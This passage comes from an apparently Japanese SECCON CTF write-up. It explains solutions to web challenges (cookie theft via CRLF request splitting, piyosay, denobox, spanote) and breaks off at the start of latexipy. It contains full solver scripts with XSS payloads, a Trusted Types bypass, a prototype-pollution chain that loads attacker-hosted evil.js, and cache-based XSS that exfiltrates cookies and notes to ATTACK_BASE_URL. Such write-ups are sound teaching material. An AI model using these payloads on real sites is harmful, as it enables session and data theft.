にて、HTTPリクエストの1行目が不正な場合に、そのHTTPメソッドを含むエラー文を載せてレスポンスする挙動になっていることがわかります。 これを利用して、つまり、cookieの値部分がHTTPメソッドの位置になるようにリクエストを構成することによって、そのレスポンスのbodyからcookieの中身を取得することを考えます。

これはCRLF injectionで1つのリクエストを2つのリクエストに分割(splitting)すれば可能です。HTTPメソッドとなる場所はContent-Lengthでうまく調整すれば良いです。

また、該当のエラー文を出力するには、リクエストの1行目を

# From: https://github.com/Pylons/waitress/blob/v2.1.2/src/waitress/parser.py#L409-L413
first_line_re = re.compile(
    b"([^ ]+) "
    b"((?:[^ :?#]+://[^ ?#/]*(?:[0-9]{1,5})?)?[^ ]+)"
    b"(( HTTP/([0-9.]+))$|$)"
)

にマッチさせる必要があります。これは、

document.cookie = '/?a=b HTTP/1.1'

のように適当なcookieを付与することで1行目が

flag=SECCON{real_flag}; /?a=b HTTP/1.1

となり、正規表現にマッチするようになります。

Solver

以上のステップを組み合わせると、botのHttpOnly cookieの中身を盗むことが可能です:

const fastify = require("fastify")();

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL ?? fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL ?? fail("No ATTACK_BASE_URL");

const LISTEN_PORT = process.env.PORT ?? "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const exploit = async () => {
  const encode = (bs) => {
    // ref. https://www.rfc-editor.org/rfc/rfc2047.html#section-2
    charset = "iso-8859-1";
    encoding = "q";
    encoded_text = Array.from(Buffer.from(bs))
      .map((x) => "=" + Buffer.from([x]).toString("hex"))
      .join("");
    return `=?${charset}?${encoding}?${encoded_text}?=`;
  };

  const contentLength =
    "Accept: */*\r\nReferer: http://nginx:3000/\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: "
      .length;
  const evilHeader = encode(`bbb\r\nContent-Length: ${contentLength}\r\n`);

  const evilJs = `
    const main = async () => {
      document.cookie = '/?a=b HTTP/1.1';

      const res = await fetch('/api?expr=1', {
        method: 'GET',
        headers: {
          'aaa': '${evilHeader}',
        },
      });
      location = '${ATTACK_BASE_URL}/?text=' + encodeURIComponent(await res.text());
    };
    main();
  `.replaceAll("\n", "");
  if (evilJs.includes('"')) {
    fail("Invalid evilJs");
  }

  const xssPayload = `<img src=0 onerror="${evilJs}">`;

  const res = await (
    await fetch(`${SECCON_BASE_URL}/report`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        expr: xssPayload,
      }),
    })
  ).text();
  console.log(res); // "Received :)"
};

const start = async () => {
  fastify.get("/", async (req, reply) => {
    const text = req.query.text;
    console.log(text); // Print a flag

    process.exit(0);
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) {
        fastify.log.error(err);
        process.exit(1);
      }

      await sleep(1000);
      await exploit();

      await sleep(5000);
      console.log("Failed");
      process.exit(1);
    }
  );
};
start();

Flag

SECCON{i5_1t_p0ssible_tO_s7eal_http_only_cooki3_fr0m_XSS}

[web] piyosay

Description:

I know the combination of DOMPurify and Trusted Types is a perfect defense for XSS attacks.

  • http://piyosay.seccon.games:3000

Overview

piyo版cowsayです。

  • クライアントサイド問
  • CSP: trusted-types default dompurify; require-trusted-types-for 'script'
  • フラグはbotのcookie

問題の本質部分はweb/result.htmlの以下の箇所だけです:

<!DOCTYPE html>
<html>
<head>
  <!-- snip -->
</head>
<body style="padding: 3rem;">
  <!-- snip  -->

  <script>
    trustedTypes.createPolicy("default", {
      createHTML: (unsafe) => {
        return DOMPurify.sanitize(unsafe)
          .replace(/SECCON{.+}/g, () => {
            // Delete a secret in RegExp
            "".match(/^$/);
            return "SECCON{REDACTED}";
          });
      },
    });
  </script>
  <script>
    const get = (path) => {
      return path.split("/").reduce((obj, key) => obj[key], document.all);
    };

    const init = async () => {
      /* snip */
    };

    const main = async () => {
      const params = new URLSearchParams(location.search);

      const message = `${params.get("message")}${
        document.cookie.split("FLAG=")[1] ?? "SECCON{dummy}"
      }`;
      // Delete a secret in document.cookie
      document.cookie = "FLAG=; expires=Thu, 01 Jan 1970 00:00:00 GMT";
      get("message").innerHTML = message;

      const emoji = get(params.get("emoji"));
      get("message").innerHTML = get("message").innerHTML.replace(/{{emoji}}/g, emoji);
    };

    document.addEventListener("DOMContentLoaded", async () => {
      await init();
      await main();
    });
  </script>
</body>
</html>

Solution

Step 1: XSS with bypassing Trusted Types

Trusted Typesの設定は以下のようになっていて、innerHTMLへの代入時に必ずcreateHTMLが呼ばれるようになっています:

    trustedTypes.createPolicy("default", {
      createHTML: (unsafe) => {
        return DOMPurify.sanitize(unsafe)
          .replace(/SECCON{.+}/g, () => {
            // Delete a secret in RegExp
            "".match(/^$/);
            return "SECCON{REDACTED}";
          });
      },
    });

例えば、以下のような文字列でbypassすることでXSSができます:

> createHTML('SECCON{x<p id="}<img src=0 onerror=console.log(1)>"></p>')
'SECCON{REDACTED}<img src=0 onerror=console.log(1)>"></p>'

ただし、

document.cookie = "FLAG=; expires=Thu, 01 Jan 1970 00:00:00 GMT";

でcookieが削除されるため、document.cookieからフラグを盗むことはできません。

Step 2: RegExp in DOMPurify

ところで、createHTML内の

// Delete a secret in RegExp
"".match(/^$/);

の処理は何のために行われているのでしょうか?

実はJavaScriptのRegExpにはおもしろい(?)振る舞いがあり、直前の正規表現のマッチ情報をRegExpのプロパティに保存するようになっています:

"".match(/^$/)はこれらのプロパティを空文字列にするための処理でした。逆にこの処理がなかった場合、replace内でフラグ文字列がマッチするためRegExp.input等からフラグを盗むことが可能になります。

なお、RegExp.inputには、例えば

document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["input"]

でアクセスできます。

ところで、DOMPurifyが文字列をどのようにsanitizeしているのかの処理を確認すると、いくつかの箇所で正規表現が使われていることがわかります:

実際に実験すると:

> DOMPurify.sanitize('x<script><SECCON{xxx}')
'x'
> RegExp.input
'<SECCON{xxx}'
> RegExp.rightContext
'ECCON{xxx}'
> document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
'ECCON{xxx}'

のようになって、これ挙動は使えそうです。

Step 3: just a XSS puzzle game!

以上のことを踏まえた上で、パズルゲームの要領でがんばるとフラグが手に入ります。

フラグが手に入るURLの構成例:

  const emoji = "0/ownerDocument/defaultView/RegExp/rightContext";
  const message = `{{emoji}} S{{emoji}}<p id="}<img src=0 onerror=fetch(\`${ATTACK_BASE_URL}/?text=\`+encodeURIComponent(document.all.message.textContent))>"></p><script><`;
  const url = `http://web:3000/result?${new URLSearchParams({
    emoji,
    message,
  })}`;

ECCON{real_flag} SECCON{REDACTED}">の文字列がATTACK_BASE_URLに投げられます。 どうしてこうなるのかは、自分の手で確かめてください!

Solver

const fastify = require("fastify")();

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL ?? fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL ?? fail("No ATTACK_BASE_URL");

const LISTEN_PORT = process.env.PORT ?? "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const exploit = async () => {
  const emoji = "0/ownerDocument/defaultView/RegExp/rightContext";
  const message = `{{emoji}} S{{emoji}}<p id="}<img src=0 onerror=fetch(\`${ATTACK_BASE_URL}/?text=\`+encodeURIComponent(document.all.message.textContent))>"></p><script><`;
  const url = `http://web:3000/result?${new URLSearchParams({
    emoji,
    message,
  })}`;

  const res = await (
    await fetch(`${SECCON_BASE_URL}/report`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        url,
      }),
    })
  ).text();
  console.log(res); // "Received :)"
};

const start = async () => {
  fastify.get("/", async (req, reply) => {
    const text = req.query.text;

    // Print a flag
    console.log("S" + text);
    // -> SECCON{real_flag} SECCON{REDACTED}">

    process.exit(0);
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) {
        fastify.log.error(err);
        process.exit(1);
      }

      await sleep(1000);
      await exploit();

      await sleep(5000);
      console.log("Failed");
      process.exit(1);
    }
  );
};
start();

Flag

SECCON{w0w_yoU_div3d_deeeeeep_iNto_DOMPurify}

[web] denobox

Description:

Your program runs in a sandbox!

  • http://denobox.seccon.games:3000

Overview

Deno sandbox問です。

  • サーバサイドはRust製
  • TypeScriptのプログラムを生成して、サププロセスとしてdenoコマンドを実行する

TypeScriptのコードの途中をvalidatorの制約のもとで自由に指定してプログラムを生成:

生成したプログラムに対して入力のJSONデータを指定して実行:

実行して得られたJSONデータを表示:

フラグは生成プログラムの{{FLAG}}部分で置換されるため、

if ("{{FLAG}}" in output) {
  delete output["{{FLAG}}"];
}

の判定箇所でどうにかしてフラグを盗むのがこの問題の目標です。

Solution

Step 1: prototype pollution

生成するプログラムは、ASTを走査することで使用可能な文や式が制限されています。 基本的には、入力オブジェクトinputを加工して出力オブジェクトoutputを生成するようなプログラムが生成可能です。

制限の例:

fn validate_identifier(ident: &Ident) -> Result<(), String> {
    // Limit available variables to `input` and `output` only.
    if ident.sym.eq("input") || ident.sym.eq("output") {
        Ok(())
    } else {
        Err(format!("{:?}", ident))
    }
}
fn validate_assign_expr(expr: &AssignExpr) -> Result<(), String> {
    (match expr.left.as_pat() {
        Some(Pat::Expr(expr)) => validate_expr(expr),
        _ => Err(format!("{:?}", expr.left)),
    })?;
    validate_expr(&expr.right)?;
    Ok(())
}

制限内容を確認するとすぐにわかるように、prototype pollution脆弱性が存在しています4。 また、通常のprototype pollutionとは異なり、関数も汚染することが可能というのが特徴的です(ただし、汚染可能な関数はかなり限られている)。

汚染の仕方によって、プログラム後半の

if ("{{FLAG}}" in output) {
  delete output["{{FLAG}}"];
}

const filename = crypto.randomUUID().replaceAll("-", "") + ".json";
await Deno.writeTextFile(filename, JSON.stringify(output));
console.log(filename);

部分で何かおもしろいことができないでしょうか?

実は

"".constructor.prototype.replaceAll = "".constructor.raw;
"".constructor.prototype.raw = input.filename;

によって、crypto.randomUUID().replaceAll("-", "")の結果を自由な文字列に指定できるようになります5

これで、拡張子.jsonの任意ファイル名で出力データ(JSON)を保存できるようになりました。これをうまく利用する方法はないでしょうか?

ただし

    let sandbox_path = path::Path::new("sandbox").join(id);
    let output = async_process::Command::new("timeout")
        .args([
            "5s",
            "deno",
            "run",
            "--allow-write=.",
            "main.ts",
            &req_body.input,
        ])
        .current_dir(&sandbox_path)
        .stdout(async_process::Stdio::piped())
        .stderr(async_process::Stdio::piped())
        .output()
        .await?;

--allow-write=.のオプションが指定されているため、保存先はカレントディレクトリのみ可能です。

Step 2: import maps in Deno

Deno v1.18から、「denoコマンド実行時にカレントディレクトリを起点に設定ファイルを探索して見つけた場合はそれを自動読み込みする機能」が追加されています:

今回の問題設定ではdeno.jsonというファイル名でJSONファイルがカレントディレクトリに存在すれば、それを設定ファイルとして認識してdeno run実行時にそれを読み込むようになります。Step 1のprototype pollutionと組み合わせるとこれは可能です。

設定ファイルのスキーマを確認すると、importMapという興味深い設定項目に気づきます:

// From: https://deno.land/x/deno@v1.27.1/cli/schemas/config-file.v1.json
/* snip */
    "importMap": {
      "description": "The location of an import map to be used when resolving modules. If an import map is explicitly specified, it will override this value.",
      "type": "string"
    },
/* snip */

Import Maps:

これを使えば、https://deno.land/std@0.161.0/crypto/mod.tsに対して任意のファイルを割り当てられます。これは自分でホストしたJavaScript/TypeScriptファイルも対象です!

つまり、RCEがなったわけですが、今回のdenoのpermissionは--allow-write=.であり、直接のファイル読み込みなどはできないことに注意が必要です。

Step 3: JavaScript Proxy

任意のJavaScriptプログラムをcrypto/mod.tsに割り当てられるようになったため、あとは

if ("{{FLAG}}" in output) {
  delete output["{{FLAG}}"];
}

のところでフラグ文字列を盗めるような仕掛けを用意するだけです。

これは以下を参考していい感じのProxyを作成して処理をhookすればOKです:

Solver

以上を組み合わせるとフラグ文字列を奪取できます。

evil.js
export const crypto = {
  randomUUID: () => ({
    replaceAll: () => "dummy",
  }),
};

const proxy1 = new Proxy(
  {},
  {
    has(target, propertyKey) {
      console.log(propertyKey); // output a flag
      return Reflect.has(...arguments);
    },
  }
);

const proxy2 = new Proxy(
  {},
  {
    set(target, property, value, receiver) {
      Object.setPrototypeOf(value, proxy1);
      return Reflect.set(...arguments);
    },
  }
);

JSON.parse = () => proxy2;
index.js
const fastify = require("fastify")();
const fs = require("node:fs");

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL || fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL || fail("No ATTACK_BASE_URL");

const LISTEN_PORT = process.env.PORT || "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const source = `
  output.importMap = input.importMap;
  output.imports = input.imports;
  "".constructor.prototype.replaceAll = "".constructor.raw;
  "".constructor.prototype.raw = input.filename;

  input.key = output;
`;

const importMapJson = JSON.stringify({
  filename: "import_map",
  imports: {
    "https://deno.land/std@0.161.0/crypto/mod.ts": `${ATTACK_BASE_URL}/evil.js`,
  },
});

const denoJson = JSON.stringify({
  filename: "deno",
  importMap: "import_map.json",
});

const exploit = async () => {
  const path = await (
    await fetch(`${SECCON_BASE_URL}/`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        source,
      }),
    })
  ).text();

  await fetch(`${SECCON_BASE_URL}${path}/run`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      input: importMapJson,
    }),
  });

  await fetch(`${SECCON_BASE_URL}${path}/run`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      input: denoJson,
    }),
  });

  const flag = await (
    await fetch(`${SECCON_BASE_URL}${path}/run`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        input: "",
      }),
    })
  ).text();

  console.log(flag);
};

const start = async () => {
  const evilJs = fs.readFileSync("evil.js").toString();
  fastify.get("/evil.js", async (req, reply) => {
    return evilJs;
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) fail(err);

      await sleep(1000);
      await exploit();
      fastify.close();
    }
  );
};
start();

Flag

SECCON{thE_denO_masc0t_dino5auR_staNding_in_tHe_s4ndbox}

ref. https://github.com/denoland/deno/blob/v1.27.1/README.md?plain=1#L6

[web] spanote

Description:

Single Page Application makes our note app simple.

  • http://spanote.seccon.games:3000

Overview

ノートを作成・削除できるメモサービスが与えられます。

ノートの作成:

ノートの削除:

botはフラグが書かれたノートを作成後、reportされたURLにアクセスします。

アプリケーションはfetchで情報を取得後DOMを構築するタイプのSPAな構成になっています。 クライアントサイド問ですがCSPは設定されてません。 ページ上にノートの内容を表示するときにはtextContentに代入をしているため、XSSは一見不可能に見えます。

Solution

Step 1: Understanding cache behavior in Google Chrome

先に結論を言うと、想定解ではGoogle Chromeのキャッシュ機構を悪用してXSSを発火させます。 この問題を解くためにはchromeにおけるキャッシュの挙動をある程度知っておく(あるいは実験して色々試す)必要があります。

今回関係するキャッシュは以下の2つです:

disk cacheのおもしろい挙動として、キャッシュの対象は、ページにレンダリングされるHTTPレスポンスだけでなくfetchで取得したHTTPレスポンスも含むというのがあります。つまり、fetchでアクセスしたリソースに対し、そのdisk cacheが表示されるようにページにアクセスするとそのリソースがページにレンダリングされます。なお、bfcacheにはそのような挙動はありません。

また、もう1つ重要な点があります。back/forward時にそのページに対する有効なキャッシュがbfcacheとdisk cacheで両方にあるとき、bfcacheが優先されることです。そのため、上記のdisk cacheの挙動を発動させるためにはbfcacheが使われない状況にする必要があります。

Step 2: Rendering a fetch response with disk cache

紹介したおもしろい挙動をこの問題でも試してみましょう。

まずはbfcacheを無効にする必要があります6。 bfcacheが使われない条件はたくさんあり、そのリストはこちらです:

お手軽なのはRelatedActiveContentsExistで、window.open()を使ってwindow.openerの参照を持つ状態にすることです。これは

でも紹介されています。

よって、以下の手順でおもしろ挙動を再現できます。

  1. 適当なページ(例: https://example.com)にアクセス
  2. open("http://spanote.seccon.games:3000/api/token")を実行
    • 不正なアクセスなので500が返ってくる
  3. 開いたタブでhttp://spanote.seccon.games:3000/にアクセス
    • このとき、http://spanote.seccon.games:3000/api/tokenへのfetchのレスポンス結果がキャッシュされる
  4. history.back()を実行
    • キャッシュされたJSON結果がページ上にレンダリングされる!

このとき開発者ツールでNetworkを確認すると、(disk cache)と表示されてdisk cacheが使われていることがわかります:

Step 3: HTML rendering with handling Content-Type

fetchの結果をレンダリングできることがわかったが、このノートアプリがfetchして取得されるレスポンスのContent-Typeはapplication/jsonapplication/octet-streamだけなので、レンダリングしてもXSSはできません。

どうにかしてtext/htmlのレスポンスにできないでしょうか?

ノートの内容は

  sendNote(reply, noteId) {
    return reply.sendFile(`db/${this.id}/${noteId}`);
  }

で、@fastify/staticを使って配信されています。

実装を確認すると、

にあるように、拡張子によってContent-Typeをきめていることがわかります。text/htmlの場合は.htmlの拡張子を付ければよいです。

ところでこのノートアプリケーションには自明なCSRF脆弱性があり、ノートの作成と削除に対しては自由にAPIを呼べます。

ノート削除APIに関する処理は以下のとおりです:

/* snip */

const validate = (id) => {
  if (typeof id !== "string") {
    throw Error(`Invalid id: ${id}`);
  }
  if (
    id.includes("..") ||
    id.includes("/") ||
    id.includes("\\") ||
    id.includes("%")
  ) {
    // No path traversal
    throw Error(`Invalid id: ${id}`);
  }
  return id;
};

/* snip */

class User {
  /* snip */

  async deleteNote(noteId) {
    await fs.writeFile(`db/${this.id}/${noteId}`, `deleted: ${noteId}`);
    return noteId;
  }

  /* snip */
}

/* snip */

fastify.post("/api/notes/delete", async (request, reply) => {
  const user = new User(request.session.userId);
  const noteId = validate(request.body.noteId);
  await user.deleteNote(noteId);
  return { noteId };
});

/* snip */

noteId<img src=0 onerror="alert(1)">.htmlに指定して削除APIを投げると、

GET /api/notes/<img src=0 onerror="alert(1)">.html

のリクエストでContent-Typeがtext/htmlのノートが返ってきます:

これを上記のテクニックでページにレンダリングするとXSSが発火します:

Step 4: Code golf

XSSペイロードがそのままURLのパスの一部になるため、あまり長いと攻撃が成功しません。

fastifyの実装を確認すると

で100文字が上限であるため、この文字数以下になるようにコードゴルフする必要があります。

これは例えば:

<img src=0 onerror="window.addEventListener('message',e=>eval(e.data))">.html

で達成可能です。

Solver

以上のことを踏まえてフラグ奪取のスクリプトを組み立てます。

public/index.html
<body>
  <script>
    const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

    const deleteNote = (url, noteId) => {
      const form = document.createElement("form");
      form.action = url;
      form.method = "post";
      form.target = "_blank";

      const input = document.createElement("input");
      input.name = "noteId";
      input.value = noteId;
      form.appendChild(input);

      document.body.appendChild(form);
      form.submit();
    };

    const evilJs = `
      (async () => {
        const { token } = await (await fetch("/api/token")).json();

        const noteIds = await (
          await fetch("/api/notes", {
            headers: { "X-Token": token },
          })
        ).json();

        const notes = await Promise.all(
          noteIds.map((id) =>
            fetch("/api/notes/" + id, {
              headers: { "X-Token": token },
            }).then((res) => res.text())
          )
        );

        navigator.sendBeacon("${location.origin}", notes.join("\\n"));
      })();
    `;

    const main = async () => {
      const params = new URLSearchParams(location.search);
      const baseUrl = params.get("baseUrl");
      const noteId = params.get("noteId");

      {
        // Delete a note (and create a deleted page) with CSRF
        const url = `${baseUrl}/api/notes/delete`;
        deleteNote(url, noteId);
      }
      await sleep(1000);

      let evilWindow;
      {
        // Access to the deleted page with no token
        // Then, the browser will render a response with 500 status.
        const url = `${baseUrl}/api/notes/${noteId}`;
        evilWindow = open(url);
      }
      await sleep(1000);
      {
        // Open the bot's user page
        // Then, it will pollute the disk cache for the deleted page.
        evilWindow.location = baseUrl;
      }
      await sleep(1000);
      {
        // Access to the deleted page again using History API
        // Then, the browser will render the cached page and the XSS will occur!
        // Note that a bfcache will not be used because the page will have a window.opener reference.
        //   ref. https://web.dev/articles/bfcache?hl=en#avoid_windowopener_references
        evilWindow.location = `${location.origin}/back.html?n=2`;
      }
      await sleep(1000);
      {
        // Send a JavaScript code via postMessage
        // Then, the XSS window will execute it!
        evilWindow.postMessage(evilJs, baseUrl);
      }
    };
    main();
  </script>
</body>
public/back.html
<script>
  const n = parseInt(new URLSearchParams(location.search).get("n"));
  history.go(-n);
</script>
index.js
const path = require("node:path");

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL || fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL || fail("No ATTACK_BASE_URL");

if (!ATTACK_BASE_URL.startsWith("http://")) {
  fail("Invalid ATTACK_BASE_URL: the CSRF will fail");
}

const LISTEN_PORT = process.env.PORT || "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const exploit = async () => {
  const noteId =
    // XSS payload:
    `<img src=0 onerror="window.addEventListener('message',e=>eval(e.data))">` +
    // .html -> Content-Type: text/html
    // ref. https://github.com/broofa/mime/blob/main/types/standard.js
    ".html";

  if (noteId.length > 100) {
    // ref. https://github.com/delvedor/find-my-way/blob/v7.3.0/index.js#L87
    fail(`Too long id: ${noteId}`);
  }
  if (
    noteId.includes("..") ||
    noteId.includes("/") ||
    noteId.includes("\\") ||
    noteId.includes("%")
  ) {
    fail(`Invalid id: ${noteId}`);
  }

  const baseUrl = "http://web:3000";

  const reportedUrl = `${ATTACK_BASE_URL}/index.html?${new URLSearchParams({
    baseUrl,
    noteId,
  })}`;

  const res = await (
    await fetch(`${SECCON_BASE_URL}/report`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        url: reportedUrl,
      }),
    })
  ).text();
  console.log(res); // "Received :)"
};

const fastify = require("fastify")();

fastify.register(require("@fastify/static"), {
  root: path.join(__dirname, "public"),
});

fastify.post("/", async (req, reply) => {
  // Received data from navigator.sendBeacon
  console.log(req.body); // Got a flag!
  process.exit(0);
});

const start = async () => {
  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) {
        fastify.log.error(err);
        process.exit(1);
      }

      await sleep(1 * 1000);
      await exploit();
      await sleep(10 * 1000);
      fail("Failed");
    }
  );
};
start();

Flag

SECCON{hack3rs_po11ute_3verything_by_v4ri0us_meanS}

[misc] latexipy

Description:

Latexify as a Service

nc latexipy.seccon.games 2337

Overview

関数を渡すとそのLaTeX\LaTeXのexpressionが返ってくるサービスが与えられます。

例:

$ nc latexipy.seccon.games 2337
Latexify as a Service!

E.g.
`` `
def solve(a, b, c):
    return (-b + math.sqrt(b**2 - 4*a*c)) / (2*a)
`` `
ref. https://github.com/google/latexify_py/blob/v0.1.1/examples/equation.ipynb

Input your function (the last line must start with __EOF__):
def f(x, y, z):
    return (x + y)*z
__EOF__

Result:
\mathrm{f}(x, y, z) \triangleq (x + y)z

ソースコード:

import sys
import ast
import re
import tempfile
from importlib import util


def get_fn_name(source: str) -> str | None:
    root = ast.parse(source)
    if type(root) is not ast.Module:
        return None
    if len(root.body) != 1:
        return None

    fn = root.body[0]
    if type(fn) is not ast.FunctionDef:
        return None

    fn.body.clear()
    if not re.fullmatch(r"def \w+\((\w+(, \w+)*)?\):", ast.unparse(fn)):
        # You must define a function without decorators, type annotations, and so on.
        return None

    return str(fn.name)


print("""
Latexify as a Service!

E.g.
`` `
def solve(a, b, c):
    return (-b + math.sqrt(b**2 - 4*a*c)) / (2*a)
`` `
ref. https://github.com/google/latexify_py/blob/v0.1.1/examples/equation.ipynb